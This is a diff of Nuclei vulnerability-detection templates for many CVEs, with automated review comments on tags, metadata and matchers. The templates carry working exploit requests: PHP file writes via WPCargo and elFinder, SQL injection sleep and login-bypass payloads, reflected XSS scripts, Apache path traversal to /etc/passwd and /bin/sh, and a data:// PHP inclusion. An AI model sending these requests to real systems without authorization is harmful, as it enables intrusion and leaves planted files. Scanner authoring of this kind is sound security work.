- |
GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1
Host: {{Hostname}}
|
||||
- |
POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
|
||||
2={{md5(num)}}
|
||||
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 != 200"
- "status_code_2 == 200"
- "status_code_3 == 200"
- "contains(body_3, md5(num))"
- "contains(body_3, 'PNG')"
condition: and
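Review bot: The second request asks barcode.php to write `{{randstr}}.php` into the plugin's `includes` directory and nothing in the template removes it afterwards, yet `tags` lacks `intrusive`, which the elFinder upload template later in this merge carries for the same kind of side effect; add `intrusive` and a comment above `requests:` such as `# leaves {{randstr}}.php under wp-content/plugins/wpcargo/includes/ on a vulnerable host`. The `status_code_1 != 200` check is a sensible guard against a pre-existing file of the same name but deserves a one-line comment, since a reader may take it for part of the vulnerability test.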
@ -0,0 +1,35 @@
id: CVE-2021-25099
|
||||
info:
name: Give < 2.17.3 - Cross-Site Scripting
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
The GiveWP WordPress plugin before 2.17.3 does not sanitise and escape the form_id parameter before outputting it back in the response of an unauthenticated request via the give_checkout_login AJAX action, leading to a Reflected Cross-Site Scripting.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f
|
||||
- https://wordpress.org/plugins/give/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25099
|
||||
classification:
|
||||
cve-id: CVE-2021-25099
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2021,wordpress,wp-plugin,wp,xss,give,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
action=give_checkout_login&form_id=xxxxxx"><script>alert(document.domain)</script>
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "<script>alert(document.domain)</script>")'
|
||||
- 'contains(body, "give_user_login")'
|
||||
condition: and
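Review bot: `classification` lists only `cve-id`; every other new template in this merge also gives `cvss-metrics`, `cvss-score` and `cwe-id` (the XSS ones use `cwe-id: CWE-79`), and the NVD page in `reference` carries the vector and score to copy. `verified: true` is a bare boolean here while the neighbouring templates quote it as `"true"`; either form works for metadata, but one should be used throughout.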
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2021-3110
|
||||
|
||||
info:
|
||||
name: PrestaShop 1.7.7.0 - SQL Injection
|
||||
author: Jaimin Gondaliya
|
||||
severity: critical
|
||||
description: |
|
||||
PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e
|
||||
- https://www.exploit-db.com/exploits/49410
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3110
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-3110
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,sqli,prestshop,edb
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "average_grade")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
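Review bot: This template sends the same `productcomments`/`CommentGrade` `id_products[]` sleep request with the same four dsl checks as the CVE-2020-26248 template added earlier in this merge, so one vulnerable shop yields two findings under two IDs; if both stay, a comment on each such as `# overlaps with CVE-2020-26248 (same productcomments request)` helps triage. `tags` repeats the `prestshop` misspelling, and the blank line the other templates keep between `tags:` and `requests:` is missing.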
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-31682
|
||||
|
||||
info:
|
||||
name: WebCTRL OEM <= 6.5 Cross-Site Scripting
|
||||
name: WebCTRL OEM <= 6.5 - Cross-Site Scripting
|
||||
author: gy741,dhiyaneshDk
|
||||
severity: medium
|
||||
description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2021-33851
|
||||
|
||||
info:
|
||||
name: Customize Login Image < 3.5.3 - Cross-Site Scripting
|
||||
name: WordPress Customize Login Image <3.5.3 - Cross-Site Scripting
|
||||
author: 8authur
|
||||
severity: medium
|
||||
description: |
|
||||
A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin.
|
||||
WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
|
||||
- https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
|
||||
|
@ -62,3 +62,5 @@ requests:
|
|||
regex:
|
||||
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
|
||||
internal: true
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-35380
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2022,termtalk,lfi,unauth,lfr,edb
|
||||
tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -16,8 +16,10 @@ info:
|
|||
cve-id: CVE-2021-35587
|
||||
cwe-id: CWE-502
|
||||
metadata:
|
||||
verified: true
|
||||
fofa-query: body="/oam/pages/css/login_page.css"
|
||||
tags: cve,cve2021,oam,rce,java,unauth,oracle
|
||||
shodan-query: http.title:"Oracle Access Management"
|
||||
tags: cve,cve2021,oam,rce,java,unauth,oracle,kev
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-37704
|
||||
|
||||
info:
|
||||
name: phpinfo Resource Exposure
|
||||
name: phpfastcache - phpinfo Resource Exposure
|
||||
author: whoever
|
||||
severity: medium
|
||||
description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache.
|
||||
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 4.3
|
||||
cve-id: CVE-2021-37704
|
||||
cwe-id: CWE-668
|
||||
tags: cve,cve2021,exposure,phpfastcache,phpinfo
|
||||
tags: cve,cve2021,exposure,phpfastcache,phpinfo,phpsocialnetwork
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -23,6 +23,7 @@ requests:
|
|||
- "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php"
|
||||
- "{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-38751
|
||||
|
||||
info:
|
||||
name: ExponentCMS <= 2.6 Host Header Injection
|
||||
name: ExponentCMS <= 2.6 - Host Header Injection
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-40438
|
||||
|
||||
info:
|
||||
name: Apache <= 2.4.48 Mod_Proxy SSRF
|
||||
name: Apache <= 2.4.48 - Mod_Proxy SSRF
|
||||
author: pdteam
|
||||
severity: critical
|
||||
description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
|
||||
|
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2021-40661
|
||||
|
||||
info:
|
||||
name: IND780 - Directory Traversal
|
||||
author: For3stCo1d
|
||||
severity: high
|
||||
description: |
|
||||
A remote, unauthenticated, directory traversal vulnerability was identified within the web interface used by IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10'). It was possible to traverse the folders of the affected host by providing a traversal path to the 'webpage' parameter in AutoCE.ini This could allow a remote unauthenticated adversary to access additional files on the affected system. This could also allow the adversary to perform further enumeration against the affected host to identify the versions of the systems in use, in order to launch further attacks in future.
|
||||
reference:
|
||||
- https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661
|
||||
- https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-40661
|
||||
cwe-id: CWE-22
|
||||
metadata:
|
||||
google-query: inurl:excalweb.dll
|
||||
shodan-query: IND780
|
||||
verified: "true"
|
||||
tags: cve,cve2021,ind780,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'ExePath=\Windows'
|
||||
- 'WorkDir=\Windows'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
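Review bot: The first `reference` URL carries the tracking parameters `?_sm_pdc=1&_sm_rid=…`; keep only `https://sidsecure.au/blog/cve-2021-40661/`. The description runs `AutoCE.ini This could` together without a full stop, and `name` gives only the model `IND780`; adding the vendor from the mt.com reference would match the `Vendor Product - Impact` form used elsewhere in this merge. `verified: "true"` is again a quoted string.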
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-41174
|
||||
|
||||
info:
|
||||
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting
|
||||
name: Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
|
||||
|
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
|
||||
author: daffainfo,666asd
|
||||
severity: high
|
||||
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|
||||
description: |
|
||||
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|
||||
reference:
|
||||
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
|
||||
|
@ -12,15 +13,14 @@ info:
|
|||
- https://twitter.com/ptswarm/status/1445376079548624899
|
||||
- https://twitter.com/h4x0r_dz/status/1445401960371429381
|
||||
- https://github.com/blasty/CVE-2021-41773
|
||||
remediation: Update to Apache HTTP Server 2.4.50 or later.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-41773
|
||||
cwe-id: CWE-22
|
||||
metadata:
|
||||
shodan-query: apache version:2.4.49
|
||||
verified: "true"
|
||||
shodan-query: Apache 2.4.49
|
||||
tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
|
||||
|
||||
variables:
|
||||
|
@ -32,6 +32,10 @@ requests:
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: {{Hostname}}
- |
GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
Host: {{Hostname}}
- |
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: {{Hostname}}
@ -42,7 +46,6 @@ requests:
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
name: LFI
regex:
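--- /dev/null
+++ b/PATH-NOT-SHOWN/CVE-2021-43421.yaml
@@ -0,0 +1,52 @@
+id: CVE-2021-43421
+
+info:
+  name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload
+  author: akincibor
+  severity: critical
+  description: |
+    A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
+  reference:
+    - https://github.com/Studio-42/elFinder/issues/3429
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-43421
+    - https://twitter.com/infosec_90/status/1455180286354919425
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-43421
+    cwe-id: CWE-434
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,elfinder,upload,rce,intrusive
+
+requests:
+  - raw:
+      - |
+        GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+
+      - |
+        GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_3, "{{randstr_1}}")'
+          - "status_code == 200"
+        condition: and
+
+    extractors:
+      - type: regex
+        name: hash
+        group: 1
+        regex:
+          - '"hash"\:"(.*?)"\,'
+        internal: true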
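Review bot: The DSL matcher pairs an indexed body check with an unindexed status check: `contains(body_3, "{{randstr_1}}")` inspects the third response while `status_code == 200` is not bound to any response index, so under `req-condition: true` the two conditions may be evaluated against different responses; `- "status_code_3 == 200"` pins both to the retrieval response. The mkfile step also writes `{{randstr}}.php:aaa` into the target's elFinder files directory and no request removes it, which the `intrusive` tag signals but the description does not; a comment such as `# NOTE: leaves {{randstr}}.php:aaa on the target, nothing cleans it up` above `requests:` would make that explicit for operators.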
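--- /dev/null
+++ b/PATH-NOT-SHOWN/CVE-2021-43510.yaml
@@ -0,0 +1,47 @@
+id: CVE-2021-43510
+
+info:
+  name: Sourcecodester Simple Client Management System 1.0 - SQL Injection
+  author: edoardottt
+  severity: critical
+  description: |
+    Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  reference:
+    - https://github.com/r4hn1/Simple-Client-Management-System-Exploit/blob/main/CVE-2021-43510
+    - https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-43510
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-43510
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,simpleclientmanagement,sqli,auth-bypass
+
+requests:
+  - raw:
+      - |
+        POST /classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=admin'+or+'1'%3d'1'--+-&password=as
+
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+    req-condition: true
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(all_headers_1, "text/html")'
+          - 'status_code_1 == 200'
+          - 'contains(body_1, "{\"status\":\"success\"}")'
+          - 'contains(body_2, "Welcome to Simple Client")'
+        condition: and
+
+# Enhanced by md on 2022/12/08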
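Review bot: The second raw request is a bodyless `GET / HTTP/1.1` that still carries `Content-Type: application/x-www-form-urlencoded`; the header describes a body that is never sent and should be dropped so the request reads as the plain session check it is. The matchers are otherwise bound to the right responses (`status_code_1`/`body_1` for the login reply, `body_2` for the follow-up page), so no change is needed there.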
@ -17,18 +17,22 @@ info:
metadata:
shodan-query: http.html:"kkFileView"
verified: "true"
tags: cve,cve2021,kkfileview,traversal
tags: cve,cve2021,kkfileview,traversal,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd"
- "{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or
- type: status
status:
@ -1,7 +1,7 @@
id: CVE-2021-43778
info:
name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.
name: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.
author: cckuailong
severity: high
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.
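Review bot: The new title still ends with a period and keeps the word "Vulnerability", unlike the other titles touched in this commit (`Apache Superset - Default Login`, `Apache APISIX Dashboard <2.10.1 - API Unauthorized Access`); `name: GLPI plugin Barcode <2.6.1 - Path Traversal` would follow that convention. The remainder of the section is unchanged context.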
@ -1,20 +1,25 @@
id: unauth-rlm
id: CVE-2021-44152
info:
name: Reprise License Manager 14.2 - Authentication Bypass
author: Akincibor
severity: critical
description: Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
description: |
Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-44152
- https://reprisesoftware.com/admin/rlm-admin-download.php?&euagree=yes
- http://packetstormsecurity.com/files/165186/Reprise-License-Manager-14.2-Unauthenticated-Password-Change.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44152
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-44152
cwe-id: CWE-287
tags: unauth,rlm,packetstorm
metadata:
verified: true
shodan-query: http.html:"Reprise License Manager"
google-dork: inurl:"/goforms/menu"
tags: cve2021,rlm,auth-bypass,packetstorm,cve
requests:
- method: GET
@ -23,13 +28,13 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "RLM Administration Commands"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/03
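Review bot: `verified: true` in the new `metadata` block is a bare YAML boolean, whereas every other template touched in this commit writes `verified: "true"` (the elFinder, Simple Client Management and WordPress templates); quote it as `verified: "true"` so the key has one type across the repository. Separately, the matchers shown in the second hunk only establish that a page containing `RLM Administration Commands` is served with a 200, while the template name claims an authentication bypass; a comment above `matchers:` stating that the template checks reachability of the admin interface rather than exercising the password change would help triage of a critical finding. The request definition itself starts inside the first hunk but its path is outside the lines shown.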
@ -1,15 +1,15 @@
id: CVE-2021-44451
info:
name: Apache Superset Default Login
name: Apache Superset - Default Login
author: dhiyaneshDK
severity: medium
description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
description: |
Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
reference:
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
- https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb
remediation: Users should upgrade to Apache Superset 1.4.0 or higher.
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
@ -25,17 +25,18 @@ requests:
- |
GET /login/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /login/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/admin/airflow/login
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
- |
GET /dashboard/list/ HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
username:
@ -43,32 +44,25 @@ requests:
password:
- admin
req-condition: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: header_2
words:
- 'session'
- type: word
part: body_3
words:
- 'DashboardFilterStateRestApi'
extractors:
- type: regex
name: csrf_token
group: 1
part: body
internal: true
regex:
- 'value="(.*?)">'
matchers-condition: and
matchers:
- type: word
part: body
condition: and
words:
- '<title>Redirecting...</title>'
- '<h1>Redirecting...</h1'
- '<a href="/">'
- type: word
part: header
words:
- 'session'
- type: status
status:
- 302
# Enhanced by mp on 2022/03/02
- 'name="csrf_token" type="hidden" value="(.*)"'
internal: true
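Review bot: The new csrf_token extractor regex `'value="(.*?)">'` captures the first `value="…">` attribute anywhere in the login page body, not necessarily the token: any input or option rendered before the hidden field is extracted instead, and the POST in the second hunk then fails the `header_2` session check with no indication why. Anchoring the pattern to the token field, e.g. `- 'name="csrf_token"[^>]*value="(.*?)"'`, keeps the non-greedy capture while binding it to the right input, which is what the replaced pattern did. Separately, the `Referer: {{BaseURL}}/admin/airflow/login` header in the login POST looks like a leftover from an Airflow template and is worth confirming against Superset's actual login path.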
@ -1,7 +1,7 @@
id: CVE-2021-45232
info:
name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access
name: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access
author: Mr-xn
severity: critical
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.
@ -1,11 +1,11 @@
id: CVE-2022-0147
info:
name: Cookie Information < 2.0.8 - Reflected Cross-Site Scripting
name: WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting
author: 8arthur
severity: medium
description: |
The Cookie Information plugin does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue
WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/2c735365-69c0-4652-b48e-c4a192dfe0d1
- https://wordpress.org/plugins/wp-gdpr-compliance/
@ -50,3 +50,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/12/08
@ -1,11 +1,11 @@
id: CVE-2022-0346
info:
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting
author: Akincibor
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution
author: Akincibor,theamanrawat
severity: medium
description: |
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a vulnerability that can lead to cross-site scripting or remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
reference:
- https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
- https://wordpress.org/plugins/www-xml-sitemap-generator-org/
@ -17,34 +17,27 @@ info:
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,wp,wordpress,wp-plugin,wpscan
tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org
requests:
- method: GET
path:
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
- '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5("CVE-2022-0346");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
stop-at-first-match: true
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')"
- "status_code==200 && contains(body_2, '<img src onerror=alert(document.domain)>') && contains(body_2, ' type specified')"
condition: or
- type: word
part: body_1
words:
- "<img src onerror=alert(document.domain)>"
- "Invalid Provider type specified"
condition: and
- type: word
part: header
part: body_2
words:
- text/html
- "2ef3baa95802a4b646f2fc29075efe34"
extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'
# Enhanced by md on 2022/09/08
# Enhanced by md on 2022/12/09
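--- /dev/null
+++ b/PATH-NOT-SHOWN/CVE-2022-0349.yaml
@@ -0,0 +1,40 @@
+id: CVE-2022-0349
+
+info:
+  name: WordPress NotificationX <2.3.9 - SQL Injection
+  author: edoardottt
+  severity: critical
+  description: |
+    WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  reference:
+    - https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a
+    - https://wordpress.org/plugins/notificationx/advanced/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0349
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-0349
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,cve
+
+requests:
+  - raw:
+      - |
+        @timeout: 15s
+        POST /?rest_route=/notificationx/v1/analytics HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        nx_id=sleep(6) -- x
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+          - 'status_code == 200'
+          - 'contains(body, "\"data\":{\"success\":true}")'
+        condition: and
+
+# Enhanced by md on 2022/12/09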
@ -1,11 +1,11 @@
id: CVE-2022-0434
info:
name: Page Views Count < 2.4.15 - Unauthenticated SQL Injection
name: WordPress Page Views Count <2.4.15 - SQL Injection
author: theamanrawat
severity: critical
description: |
Unauthenticated SQL Injection in WordPress Page Views Count Plugin (versions < 2.4.15).
WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability. It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
